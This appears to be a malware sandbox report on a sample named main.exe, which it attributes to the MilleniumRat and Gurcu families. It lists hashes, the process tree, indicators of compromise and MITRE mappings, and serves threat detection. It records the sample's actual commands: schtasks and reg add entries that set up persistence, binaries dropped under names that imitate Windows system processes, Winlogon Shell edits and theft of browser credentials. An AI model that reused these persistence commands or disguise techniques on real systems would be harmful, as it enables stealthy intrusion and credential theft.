Analysis
Max time kernel: 149s
Max time network: 150s
Platform: windows11-21h2_x64
Resource: win11-20241007-en
Resource tags: arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
Submitted: 10-11-2024 11:20

Static task: static1
Behavioral task behavioral1: Sample main.exe, Resource win7-20240903-en
Behavioral task behavioral2: Sample main.exe, Resource win10v2004-20241007-en
Behavioral task behavioral3: Sample main.exe, Resource win11-20241007-en
General
Target: main.exe
Size: 5.6MB
MD5: 3d3c49dd5d13a242b436e0a065cd6837
SHA1: e38a773ffa08452c449ca5a880d89cfad24b6f1b
SHA256: e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf
SHA512: dd0e590310392b0543d47a2d24d55f6f091ba59acc0d7ea533039ffb48f1b8938587889bcfa19b0538a62ba26fcde2172253860ceab34af40fd7bf65b6587b00
SSDEEP: 98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR6s:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciY
Malware Config
Extracted
gurcu
Signatures

Gurcu family

MilleniumRat
MilleniumRat is a remote access trojan written in C#.

Milleniumrat family

Modifies WinLogon for persistence (2 TTPs, 5 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\spoolsv.exe\"" | ChainComServermonitor.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\spoolsv.exe\", \"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Idle.exe\"" | ChainComServermonitor.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\spoolsv.exe\", \"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Idle.exe\", \"C:\\Users\\Admin\\Start Menu\\fontdrvhost.exe\"" | ChainComServermonitor.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\spoolsv.exe\", \"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Idle.exe\", \"C:\\Users\\Admin\\Start Menu\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Windows Defender\\dllhost.exe\"" | ChainComServermonitor.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\"" | ChainComServermonitor.exe
Process spawned unexpected child process (15 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2860 | 4448 | schtasks.exe | 79
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4496 | 4448 | schtasks.exe | 79
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4712 | 4448 | schtasks.exe | 79
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4272 | 4448 | schtasks.exe | 79
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4064 | 4448 | schtasks.exe | 79
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 548 | 4448 | schtasks.exe | 79
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 868 | 4448 | schtasks.exe | 79
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3940 | 4448 | schtasks.exe | 79
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3380 | 4448 | schtasks.exe | 79
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2056 | 4448 | schtasks.exe | 79
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1572 | 4448 | schtasks.exe | 79
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1452 | 4448 | schtasks.exe | 79
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3432 | 4448 | schtasks.exe | 79
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4648 | 4448 | schtasks.exe | 79
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4056 | 4448 | schtasks.exe | 79
Downloads MZ/PE file

Executes dropped EXE (4 IoCs)
pid | Process
3872 | Update.exe
3892 | svchost64.exe
700 | ChainComServermonitor.exe
3112 | dllhost.exe

Loads dropped DLL (2 IoCs)
pid | Process
868 | main.exe
3872 | Update.exe
Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 11 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\"" | ChainComServermonitor.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\spoolsv.exe\"" | ChainComServermonitor.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\spoolsv.exe\"" | ChainComServermonitor.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Idle.exe\"" | ChainComServermonitor.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Admin\\Start Menu\\fontdrvhost.exe\"" | ChainComServermonitor.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Admin\\Start Menu\\fontdrvhost.exe\"" | ChainComServermonitor.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\"" | ChainComServermonitor.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Idle.exe\"" | ChainComServermonitor.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Defender\\dllhost.exe\"" | ChainComServermonitor.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Defender\\dllhost.exe\"" | ChainComServermonitor.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
flow | ioc
7 | raw.githubusercontent.com
1 | raw.githubusercontent.com
5 | raw.githubusercontent.com

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
1 | ip-api.com

Drops file in System32 directory (2 IoCs)
description | ioc | Process
File created | \??\c:\Windows\System32\CSC26044B8DD8DC46CF83951E88991427A1.TMP | csc.exe
File created | \??\c:\Windows\System32\j7xqt2.exe | csc.exe

Enumerates processes with tasklist (1 TTPs, 1 IoCs)
pid | Process
3856 | tasklist.exe

Drops file in Program Files directory (9 IoCs)
description | ioc | Process
File created | C:\Program Files (x86)\MSBuild\RuntimeBroker.exe | ChainComServermonitor.exe
File created | C:\Program Files (x86)\MSBuild\9e8d7a4ca61bd9 | ChainComServermonitor.exe
File created | C:\Program Files\Microsoft Office 15\ClientX64\6ccacd8608530f | ChainComServermonitor.exe
File opened for modification | C:\Program Files (x86)\MSBuild\RuntimeBroker.exe | ChainComServermonitor.exe
File created | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe | ChainComServermonitor.exe
File created | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\f3b6ecef712a24 | ChainComServermonitor.exe
File created | C:\Program Files\Microsoft Office 15\ClientX64\Idle.exe | ChainComServermonitor.exe
File created | C:\Program Files (x86)\Windows Defender\dllhost.exe | ChainComServermonitor.exe
File created | C:\Program Files (x86)\Windows Defender\5940a34987c991 | ChainComServermonitor.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 3 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | svchost64.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | Update.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | Update.exe

Delays execution with timeout.exe (1 IoCs)
pid | Process
1572 | timeout.exe

Modifies registry class (2 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings | svchost64.exe
Key created | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings | ChainComServermonitor.exe

Modifies registry key (1 TTPs, 1 IoCs)
pid | Process
3992 | reg.exe
Scheduled Task/Job: Scheduled Task (1 TTPs, 15 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4272 | schtasks.exe
548 | schtasks.exe
4056 | schtasks.exe
2860 | schtasks.exe
3380 | schtasks.exe
1572 | schtasks.exe
3432 | schtasks.exe
1452 | schtasks.exe
4648 | schtasks.exe
4496 | schtasks.exe
4064 | schtasks.exe
868 | schtasks.exe
2056 | schtasks.exe
4712 | schtasks.exe
3940 | schtasks.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs; identical rows collapsed)
pid | Process
868 | main.exe
3872 | Update.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 868 | main.exe
Token: SeDebugPrivilege | 3856 | tasklist.exe
Token: SeDebugPrivilege | 3872 | Update.exe
Token: SeDebugPrivilege | 700 | ChainComServermonitor.exe
Token: SeDebugPrivilege | 3112 | dllhost.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
pid | Process
3872 | Update.exe
Suspicious use of WriteProcessMemory (41 IoCs; duplicate rows collapsed)
description | pid | Process | procid_target
PID 868 wrote to memory of 1140 | 868 | main.exe | 80
PID 1140 wrote to memory of 3856 | 1140 | cmd.exe | 82
PID 1140 wrote to memory of 2056 | 1140 | cmd.exe | 83
PID 1140 wrote to memory of 1572 | 1140 | cmd.exe | 84
PID 1140 wrote to memory of 3872 | 1140 | cmd.exe | 85
PID 3872 wrote to memory of 2980 | 3872 | Update.exe | 86
PID 2980 wrote to memory of 3992 | 2980 | cmd.exe | 88
PID 3872 wrote to memory of 3892 | 3872 | Update.exe | 89
PID 3892 wrote to memory of 1892 | 3892 | svchost64.exe | 90
PID 1892 wrote to memory of 3100 | 1892 | WScript.exe | 91
PID 3100 wrote to memory of 700 | 3100 | cmd.exe | 93
PID 700 wrote to memory of 3516 | 700 | ChainComServermonitor.exe | 97
PID 3516 wrote to memory of 4580 | 3516 | csc.exe | 99
PID 700 wrote to memory of 2124 | 700 | ChainComServermonitor.exe | 100
PID 2124 wrote to memory of 3404 | 2124 | csc.exe | 102
PID 700 wrote to memory of 4408 | 700 | ChainComServermonitor.exe | 115
PID 4408 wrote to memory of 4644 | 4408 | cmd.exe | 117
PID 4408 wrote to memory of 3992 | 4408 | cmd.exe | 118
PID 4408 wrote to memory of 3112 | 4408 | cmd.exe | 119

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Users\Admin\AppData\Local\Temp\main.exe (depth 1, PID 868)
  Command line: "C:\Users\Admin\AppData\Local\Temp\main.exe"
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\cmd.exe (depth 2, PID 1140)
    Command line: "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp7BA8.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp7BA8.tmp.bat
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\tasklist.exe (depth 3, PID 3856)
      Command line: Tasklist /fi "PID eq 868"
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\find.exe (depth 3, PID 2056)
      Command line: find ":"

    C:\Windows\system32\timeout.exe (depth 3, PID 1572)
      Command line: Timeout /T 1 /Nobreak
      - Delays execution with timeout.exe

    C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe (depth 3, PID 3872)
      Command line: "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Checks processor information in registry
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\cmd.exe (depth 4, PID 2980)
        Command line: "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\reg.exe (depth 5, PID 3992)
          Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
          - Adds Run key to start application
          - Modifies registry key

      C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe (depth 4, PID 3892)
        Command line: "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe"
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Modifies registry class
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\WScript.exe (depth 5, PID 1892)
          Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\cmd.exe (depth 6, PID 3100)
            Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory

            C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe (depth 7, PID 700)
              Command line: "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
              - Modifies WinLogon for persistence
              - Executes dropped EXE
              - Adds Run key to start application
              - Drops file in Program Files directory
              - Modifies registry class
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory

              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 8, PID 3516)
                Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\43k4gauj\43k4gauj.cmdline"
                - Suspicious use of WriteProcessMemory

                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 9, PID 4580)
                  Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8400.tmp" "c:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\CSCD88D0256430145EB99A32A344BDD41A7.TMP"

              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 8, PID 2124)
                Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lkywtov5\lkywtov5.cmdline"
                - Drops file in System32 directory
                - Suspicious use of WriteProcessMemory

                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 9, PID 3404)
                  Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES847D.tmp" "c:\Windows\System32\CSC26044B8DD8DC46CF83951E88991427A1.TMP"

              C:\Windows\System32\cmd.exe (depth 8, PID 4408)
                Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eXK6l6ZVYg.bat"
                - Suspicious use of WriteProcessMemory

                C:\Windows\system32\chcp.com (depth 9, PID 4644)
                  Command line: chcp 65001

                C:\Windows\system32\w32tm.exe (depth 9, PID 3992)
                  Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

                C:\Program Files (x86)\Windows Defender\dllhost.exe (depth 9, PID 3112)
                  Command line: "C:\Program Files (x86)\Windows Defender\dllhost.exe"
                  - Executes dropped EXE
                  - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\schtasks.exe (depth 1, PID 2860)
  Command line: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\RuntimeBroker.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 4496)
  Command line: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\RuntimeBroker.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 4712)
  Command line: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\MSBuild\RuntimeBroker.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 4272)
  Command line: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 4064)
  Command line: schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 548)
  Command line: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 868)
  Command line: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Idle.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 3940)
  Command line: schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Idle.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 3380)
  Command line: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Idle.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 2056)
  Command line: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Start Menu\fontdrvhost.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 1572)
  Command line: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Admin\Start Menu\fontdrvhost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 1452)
  Command line: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Start Menu\fontdrvhost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 3432)
  Command line: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Defender\dllhost.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 4648)
  Command line: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\dllhost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 4056)
  Command line: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Defender\dllhost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution (2)
    Registry Run Keys / Startup Folder (1)
    Winlogon Helper DLL (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Privilege Escalation
  Boot or Logon Autostart Execution (2)
    Registry Run Keys / Startup Folder (1)
    Winlogon Helper DLL (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (1)
    Credentials In Files (1)
Downloads